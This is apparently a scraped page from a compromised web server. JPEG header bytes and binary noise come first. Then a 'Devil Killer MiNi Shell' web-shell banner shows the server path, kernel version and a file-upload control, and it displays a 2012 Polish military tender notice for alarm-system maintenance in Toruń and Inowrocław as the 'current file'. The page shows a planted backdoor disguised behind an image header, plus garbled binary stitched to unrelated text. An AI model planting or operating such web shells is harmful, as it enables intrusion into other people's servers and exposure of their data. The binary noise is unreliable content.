JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120221/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120221/51982-N-2012.html

<p class="kh_header"><b>Toruń: KONSERWACJA I NAPRAWY AWARYJNE SYSTEMÓW ALARMOWYCH 
W JEDNOSTKACH WOJSKOWYCH ZNAJDUJĄCYCH SIĘ NA ZAOPATRZENIU 12 WOG.
Numer referencyjny P/33/IW/12</b><br>
<b>Numer ogłoszenia: 51982 - 2012; data zamieszczenia: 21.02.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> 12 Wojskowy Oddział Gospodarczy (Jednostka Wojskowa 4620) , ul. Okólna 37, 87-100 Toruń, woj. kujawsko-pomorskie, tel. 56 653 36 94, faks 56 653 36 60.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.12wog.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> KONSERWACJA I NAPRAWY AWARYJNE SYSTEMÓW ALARMOWYCH 
W JEDNOSTKACH WOJSKOWYCH ZNAJDUJĄCYCH SIĘ NA ZAOPATRZENIU 12 WOG.
Numer referencyjny P/33/IW/12.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia są usługi konserwacji i napraw systemów alarmowych świadczone dla CSAiU w Toruniu, JW. 1523,  JW 1641 i 1984 w Inowrocławiu oraz RWT w Bydgoszczy i Oddziału ŻW w Bydgoszczy. 
Wykaz elementów systemu eksploatowanych przez poszczególnych Odbiorców Usługi zawarty              jest w załączniku nr 1 do SIWZ, dla poszczególnych części.
1. Wymagania związane z przedmiotem zamówienia:
a. Konserwacja jeden raz w kwartale  i usuwanie awarii systemów alarmowych zainstalowanych u Odbiorców Usługi.
b. Systemy alarmowe funkcjonują w klasie SA-3 i SA-4 (urządzenia alarmowe klasy S,C).
c. Konserwacja winna być wykonana przy spełnieniu norm:
- PN-EN 50131-1:2009 Systemy alarmowe - systemy sygnalizacji włamania  i napadu    część 1 wymagania systemowe, ogólne, podstawowe.
- PN-50131-3 Systemy alarmowe - systemy sygnalizacji włamania i napadu część 3 centrale alarmowe
- PN-EN 50131-2-2:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu    część 2-2 czujki sygnalizujące włamanie, pasywne czujki podczerwieni.
- PN-EN 50131-2-4:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu    część 2-4 dualne czujki pasywnej podczerwieni i mikrofalowe.
- PN-EN 50131-2-3:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu    część 2-3 czujki mikrofalowe.
- PN-EN 50131-2-5:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu    część 2-5 dualne czujki pasywne i ultradźwiękowe.
- PN-EN 50131-2-6:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu    część 2-6 czujki magnetyczne.
- PN-EN 50131-5-3:2009 Systemy alarmowe - systemy sygnalizacji włamania i napadu    część 5-3 systemy bezprzewodowe.
- PN-EN 50131-6:2008 Systemy alarmowe - systemy sygnalizacji włamania i napadu    część 6 zasilacze.
- PN-EN 50132:2002 Systemy alarmowe - systemy dozorowe CCTV.
- PN-EN 50133:2002 Systemy alarmowe - systemy kontroli dostępu.
- PN-EN 50134:2002 Systemy alarmowe osobiste.
- PN-EN 50136:2002 Systemy alarmowe - urządzenia i systemy transmisji alarmu.
- PN- EN 54 - 1: 1998 Systemy sygnalizacji pożarowej.
- PN-EN ISO/IEC 17050-1 i 2 Deklaracja zgodności.
- NO-04 - A004:2010 Norma Obronna - Obiekty wojskowe - Systemy Alarmowe.

d. Konserwacja przeprowadzana będzie  zgodnie z wymaganiami dotyczącymi danego systemu alarmowego (jeden raz na kwartał). Podczas każdej konserwacji wykonywane będzie:
- sprawdzenie zgodności z wymogami wszystkich połączeń giętkich;
- sprawdzenie czy zasilanie główne i rezerwowe pracują i są sprawne oraz ich obsługa konserwacyjna;
- sprawdzenie centrali i ich obsługa konserwacyjna zgodnie z procedurą zakładu instalacji alarmowych, czyszczenie filtrów przeciwpyłowych w urządzeniach;
- sprawdzenie poprawności transmisji alarmu do central zbiorczych;
- sprawdzenie poprawności działania komputerowych systemów ochrony i kontroli dostępu; zwalnianie pamięci w buforach;
- sprawdzenie stanu technicznego i konserwacja sprzętu komputerowego;
- konserwacja własnymi środkami elementów systemu ochrony i kontroli dostępu 
w zakresie zgodnym z warunkami eksploatacji zapewniającymi długotrwałe i niezawodne działanie systemów;
- sprawdzenie czy system ochrony i kontroli dostępu jest całkowicie w stanie gotowości do pracy;
- sprawdzenie instalacji, rozmieszczenia i zamocowania całego wyposażenia 
i urządzeń na podstawie dokumentacji technicznej- powykonawczej;
- sprawdzenie działania wszystkich czujek, łącznie z urządzeniami uruchamianymi ręcznie i ich obsługa konserwacyjna;
- sprawdzenie ciągłości połączeń galwanicznych obwodów instalacji uziemiającej, ochronnej i odgromowej systemu ochrony i kontroli dostępu;
- sprawdzenie działania każdego akustycznego sygnalizatora alarmowego oraz ich obsługa i konserwacja;
- sprawdzenie procedur postępowania na wybranych liniach alarmowych.

e. Zakres procedur i sprawdzeń wykonywanych w ramach obsługiwania rocznego:
- wszystkie prace określone w zakresie obsługiwania kwartalnego;
- pomiar rezystancji obwodów instalacji uziemiającej, ochronnej i odgromowej i ich skuteczność działania;
- wymiana filtrów przeciwpyłowych w urządzeniach.
f. Podjęcie działań w  czasie 4 godzin od zgłoszenia awarii systemu alarmowego i jej usunięcie w czasie 48 godzin.
g. Gwarancja na wykonane usługi i wymieniane urządzenia minimum 12 miesięcy..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada:
1. Aktualną koncesję MSWiA uprawniającą do wykonywania działalności gospodarczej w zakresie objętym zamówieniem publicznym (zgodnie z art.3 pkt. 2, art.15 pkt.1 Ustawy o ochronie osób i mienia) 
2. Aktualne Świadectwo Bezpieczeństwa Przemysłowego o klauzuli POUFNE minimum II (drugiego) stopnia (zgodnie z art. 55 Ustawy o ochronie informacji niejawnych)- dotyczy części nr 1,2,3;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca oświadczy, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał usługi polegające na konserwacji przedmiotowych systemów alarmowych o wartości brutto nie mniejszej niż dla:
- Część nr 1:   39 000 zł.;
- Część nr 2:   18 000 zł.;
- Część nr 3:   87 000 zł.;
- Część nr 4:   30 000 zł..
- Część nr 5:     1 500 zł.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że dysponuje:
1. odpowiednią liczbą pracowników (projektanci, instalatorzy w zakresie instalowania systemów alarmowych klasy SA-4, konserwatorzy) zapewniającą ciągłość realizacji zamówienia pomimo urlopów czy absencji chorobowej, przy zachowaniu obowiązujących przepisów - na realizację każdej części odrębnie, posiadającymi:
- Aktualną licencję pracownika zabezpieczenia technicznego II (drugiego) stopnia;
- Aktualne poświadczenie bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych o klauzuli co najmniej zastrzeżone (projektanci, instalatorzy, konserwatorzy) - dotyczy części nr 4 i 5;
- Aktualne poświadczenie bezpieczeństwa do dostępu do informacji niejawnych o klauzuli co najmniej poufne dla projektantów, instalatorów oraz co najmniej dwóch konserwatorów, pozostali konserwatorzy poświadczenie bezpieczeństwa lub upoważnienie do dostępu do informacji niejawnych o klauzuli co najmniej zastrzeżone  - dotyczy części nr 1,2,3;
- Aktualny kurs pracownika zabezpieczenia technicznego.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, iż posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;">zaświadczenie niezależnego podmiotu zajmującego się poświadczaniem zgodności działań wykonawcy z normami jakościowymi, jeżeli zamawiający odwołują się do systemów zapewniania jakości opartych na odpowiednich normach europejskich</li>

<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">1. Dokument (autoryzacja) wystawiony przez producenta przedmiotowych systemów uprawniający Wykonawcę do wykonywania czynności instalacyjnych oraz serwisowych w zakresie systemów: SEMICO -2; GALAXY, DIALOG-128; SATEL, ROGER, COMPAS - dotyczy części nr 1;
2. Dokument (autoryzacja) wystawiony przez producenta przedmiotowych systemów uprawniający Wykonawcę do wykonywania czynności instalacyjnych oraz serwisowych w zakresie systemów/urządzeń: TAP HOLDING SP. Z O.O., AAT TRADING COMPANY, SEMICO, ADEMCO, SIEMENS, ARITECH, BOSCH SECURITY SYSTEMS, IFTER, ROGER, ROKONET, SATEL, POLON ALFA - dotyczy części nr 2;
3. Dokument (autoryzacja) wystawiony przez producenta przedmiotowych systemów uprawniający Wykonawcę do wykonywania czynności instalacyjnych oraz serwisowych w zakresie systemów: SEMICO -2; COMPAS-2026, SATEL-CA-64, GALAXY-512, OMNITRAX - dotyczy części nr 3;
4. Dokument (autoryzacja) wystawiony przez producenta przedmiotowych systemów uprawniający Wykonawcę do wykonywania czynności instalacyjnych oraz serwisowych w zakresie systemów: GALAXY-512, ROKONET, ROGER - dotyczy części nr 4;
5. Dokument (autoryzacja) wystawiony przez producenta przedmiotowych systemów uprawniający Wykonawcę do wykonywania czynności instalacyjnych oraz serwisowych w zakresie systemu: GUARD, centrala alarmowa CA-64 wykonana w klasie SA-4  - dotyczy części nr 5;</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1. Oświadczenie Wykonawcy, że w ciągu ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres ten jest krótszy, w tym okresie wykonał usługi wykonał usługi polegające na konserwacji przedmiotowych systemów alarmowych o wartości brutto nie mniejszej niż dla:
Część nr 1:   39 000 zł.; Część nr 2:   18 000 zł.; Część nr 3:   87 000 zł.; Część nr 4:   30 000 zł.; Część nr 5:     1 500 zł., potwierdzające spełnienie warunku, o którym mowa w części VIII pkt. 1.2. SIWZ.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Cena za 1rbh napraw awaryjnych - 20</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. Zamawiający zgodnie z art. 144 ust. 1 Ustawy przewiduje możliwość wprowadzenia zmian do treści zawartej umowy w stosunku do treści oferty na podstawie, której dokonano wyboru Wykonawcy, jeżeli konieczność wprowadzenia takich zmian wynika z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy lub zmiany te są korzystne dla Zamawiającego  w zakresie następującym:
- zamianę danego pracownika Wykonawcy - ujętego na wykazie załączonym do umowy- pod warunkiem spełnienia wymagań określonych dla danej osoby w SIWZ oraz Załącznikach do SIWZ w przypadku zaistnienia nieprzewidzianych okoliczności nie powstałych z winy Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.12wog.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> odebrać osobiście w siedzibie JW. 4620 Toruń ul. Okólna 37 w kancelarii (budynek nr 97, pokój nr 11), zamówić faksem (o przesłanie pocztą) lub pobrać ze strony internetowej (bezpłatnie).</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.03.2012 godzina 10:30, miejsce: Oferty należy składać w JW. 4620 Toruń ul. Okólna 37 w kancelarii jawnej (budynek nr 97, pokój nr 11) lub drogą pocztową na adres JW. 4620.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Centrum Szkolenia Artylerii i Uzbrojenia (CSAiU) w Toruniu znajdujących się w kompleksach koszarowych: 2022, 2016, 2014, 2012, 2032 w Toruniu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Centrum Szkolenia Artylerii i Uzbrojenia (CSAiU) w Toruniu znajdujących się w kompleksach koszarowych: 2022, 2016, 2014, 2012, 2032 w Toruniu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. cena za 1 rbh napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Jednostki Wojskowej 1523 w Inowrocławiu znajdujących się w kompleksach koszarowych: 1531, 1537, 4476 w Inowrocławiu..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Jednostki Wojskowej 1523 w Inowrocławiu znajdujących się w kompleksach koszarowych: 1531, 1537, 4476 w Inowrocławiu..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za 1 rbh napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Jednostki Wojskowej 1641 i 1984 w Inowrocławiu znajdujących się w kompleksie koszarowym: 1532 
w Inowrocławiu oraz kompleksie koszarowym: 6005 w Latkowie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Jednostki Wojskowej 1641 i 1984 w Inowrocławiu znajdujących się w kompleksie koszarowym: 1532 w Inowrocławiu oraz kompleksie koszarowym: 6005 w Latkowie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.32.41.00-3.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 80</li>
<li>2. Cena za 1rbh napraw awaryjnych - 20</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Konserwacje i naprawy awaryjne systemów alarmowych świadczone dla Regionu Wsparcia Teleinformatycznego (RWT) w Bydgoszczy znajdujących się w kompleksie koszarowym: 2016 w Toruniu oraz kompleksie koszarowym: 8617 w Chorągiewce, 12 km od Torunia..</p>
